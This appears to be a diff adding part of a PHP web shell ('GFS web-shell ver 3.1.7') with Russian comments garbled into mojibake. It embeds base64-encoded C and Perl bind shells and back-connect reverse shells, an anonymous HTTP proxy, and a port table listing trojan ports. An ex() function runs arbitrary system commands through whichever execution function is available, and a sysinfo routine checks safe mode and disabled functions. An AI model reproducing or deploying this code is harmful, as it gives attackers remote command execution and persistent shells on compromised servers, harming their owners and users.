+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ðåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèðîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîðåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
